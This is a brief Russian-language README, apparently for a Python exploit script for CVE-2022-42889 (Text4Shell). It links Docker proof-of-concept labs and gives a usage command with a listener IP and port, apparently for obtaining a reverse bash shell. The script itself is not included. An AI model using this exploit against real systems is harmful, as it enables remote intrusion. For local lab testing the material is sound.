
скрипт python для CVE-2022-42889
Python-скрипт для CVE-2022-42889
Чтобы протестировать это локально, следуйте Docker POC: https://github.com/karthikuj/cve-2022-42889-text4shell-docker
Для PHP-версии: https://github.com/ClickCyber/cve-2022-42889
Если вы запускаете это и эксплуатируете локально, IP-адрес, который нужно использовать, — это шлюз, создаваемый при запуске Docker-контейнера.
После получения bash-оболочки в Docker-контейнере

Убедитесь, что вы сделали скрипт исполняемым с помощью chmod
./cve-2022-42889.py 172.17.0.1 9001 'http://localhost/text4shell/attack?search='

NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-42889